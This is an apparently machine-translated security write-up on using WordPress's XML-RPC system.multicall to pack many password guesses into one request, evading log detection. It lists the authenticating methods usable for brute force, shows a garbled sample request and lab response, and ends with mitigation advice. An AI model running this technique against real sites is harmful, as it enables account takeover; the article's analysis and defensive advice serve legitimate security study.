Analysis on the efficient cracking principle of WordPress using XMLRPC

Analysis on the efficient cracking principle of WordPress using XMLRPC

Xmlrpc is an interface for remote calls in WordPress, and it was proposed and exploited a long time ago to use xmlrpc to call the interface for account brute-force cracking. SUCURI recently published an article about how to use xmlrpc to call the system in the interface. multicall improves the brute-force cracking Efficiency, allowing thousands of account and password combinations to complete one request, greatly compressing the number of requests, and avoiding log detection to a certain extent.

0x01 Principle Analysis

The definition code for the xmlrpc service in WordPress is mainly located in wp-initdes/class-IXR.php and wp-initdes/class-wp-xmlrpc-server.php. The base class IXR_Server defines three built-in call Methods: system. getCapabilities, system. listMethods, and system. multicall. The call ing is located in the IXR_Server base class definition:

function setCallbacks(){    $this->callbacks['system.getCapabilities'] = 'this:getCapabilities';    $this->callbacks['system.listMethods'] = 'this:listMethods';    $this->callbacks['system.multicall'] = 'this:multiCall';}

When the base class is initialized, setCallbacks () is called to bind the call ing relationship:

Function _ construct ($ callbacks = false, $ data = false, $ wait = false) {$ this-> setCapabilities (); if ($ callbacks) {$ this-> callbacks = $ callbacks;} $ this-> setCallbacks (); // bind the default three basic call mappings if (! $ Wait) {$ this-> serve ($ data );}}

Let's take a look at the corresponding processing functions of system. multicall:

function multiCall($methodcalls){    // See http://www.xmlrpc.com/discuss/msgReader$1208    $return = array();    foreach ($methodcalls as $call) {        $method = $call['methodName'];        $params = $call['params'];        if ($method == 'system.multicall') {            $result = new IXR_Error(-32600, 'Recursive calls to system.multicall are forbidden');        } else {            $result = $this->call($method, $params);        }        if (is_a($result, 'IXR_Error')) {            $return[] = array(                'faultCode' => $result->code,                'faultString' => $result->message            );        } else {            $return[] = array($result);        }    }    return $return;}

It can be seen from the code that the program will parse the XML passed by the request, traverse each interface in multiple calls to call the request, and return the final call results together to the request end.

In this way, 500 or even 10000 types of account passwords can be cracked and included in a request. The server will soon finish processing and return results, which greatly improves the efficiency of brute-force cracking, multiple call interfaces are used to compress the number of requests. If you attempt to use a password of 10000 accounts, only one access log is left on the target server, which avoids Log Security Detection to a certain extent.

By reading the xmlrpc-related code in WordPress, a large number of xmlrpc calls can verify the user name and password:

if ( !$user = $this->login($username, $password) )    return $this->error;

By searching the preceding logon verification code, you can obtain a list of all calling methods that can be used for brute-force cracking:

wp.getUsersBlogs, wp.newPost, wp.editPost, wp.deletePost, wp.getPost, wp.getPosts, wp.newTerm, wp.editTerm, wp.deleteTerm, wp.getTerm, wp.getTerms, wp.getTaxonomy, wp.getTaxonomies, wp.getUser, wp.getUsers, wp.getProfile, wp.editProfile, wp.getPage, wp.getPages, wp.newPage, wp.deletePage, wp.editPage, wp.getPageList, wp.getAuthors, wp.getTags, wp.newCategory, wp.deleteCategory, wp.suggestCategories, wp.getComment, wp.getComments, wp.deleteComment, wp.editComment, wp.newComment, wp.getCommentStatusList, wp.getCommentCount, wp.getPostStatusList, wp.getPageStatusList, wp.getPageTemplates, wp.getOptions, wp.setOptions, wp.getMediaItem, wp.getMediaLibrary, wp.getPostFormats, wp.getPostType, wp.getPostTypes, wp.getRevisions, wp.restoreRevision, blogger.getUsersBlogs, blogger.getUserInfo, blogger.getPost, blogger.getRecentPosts, blogger.newPost, blogger.editPost, blogger.deletePost, mw.newPost, mw.editPost, mw.getPost, mw.getRecentPosts, mw.getCategories, mw.newMediaObject, mt.getRecentPostTitles, mt.getPostCategories, mt.setPostCategories

Here, we use parameter transfer to test wp. getUsersBlogs, which is the most direct method for obtaining information. The two account and password attempts are included in the same request and the XML request content is constructed as follows:

   
  
   system.multicall
    
  
       
   
          
     
       
       
        
         methodName
        
        
         
          wp.getUsersBlogs
         
        
        
       
        
         params
        
        
          
          
           
            admin
           
           
          
           
            admin888
           
           
        
        
      
            
     
       
       
        
         methodName
        
        
         
          wp.getUsersBlogs
         
        
        
       
        
         params
        
        
          
          
           
            guest
           
           
          
           
            test
           
           
        
        
      
         
     
  
 

Send the preceding XML request containing two sub-calls to the xmlrpc server portal. If the xmlrpc service is enabled, the following information is returned:

 
   
  
         
         
      
     
       
       
         
         
           
           
            
              IsAdmin
            
            
             
               1
             
            
            
           
            
              Url
            
            
             
               Http: // 172.16.96.130/xampp/wordpress-4.3.1/
             
            
            
           
            
              Blogid
            
            
             
               1
             
            
            
           
            
              BlogName
            
            
             
               WordPress 4.3.1
             
            
            
           
            
              Xmlrpc
            
            
             
               Http: /172.16.96.130/xampp/wordpress-4.3.1/xmlrpc. php
             
            
           
          
         
       
       
     
       
       
        
          FaultCode
        
        
         
           403
         
        
        
       
        
          FaultString
        
        
         
           The user name or password is incorrect.
         
        
       
      
           
         
  
 

The results show that two account and password combinations are processed in the same request and the results are returned in a centralized manner. In this way, the account brute-force cracking efficiency can be greatly improved.

0x02 protection suggestions

This problem still exists in the latest WordPress version (4.3.1. Multi-call (multicall) is the standard of xmlrpc. To prevent attackers from using this point to launch brute-force attacks on the website, the following protection suggestions are provided:

Configure Web servers such as Apache and Nginx to restrict xmlrpc. php file access. xmlrpc can be deleted without affecting the website operation. php file; install and enable the Disable XML-RPC from the official plug-in Library; Add code add_filter ('xmlrpc _ enabled', '_ return_false'); To the WordPress configuration file wp-config.php;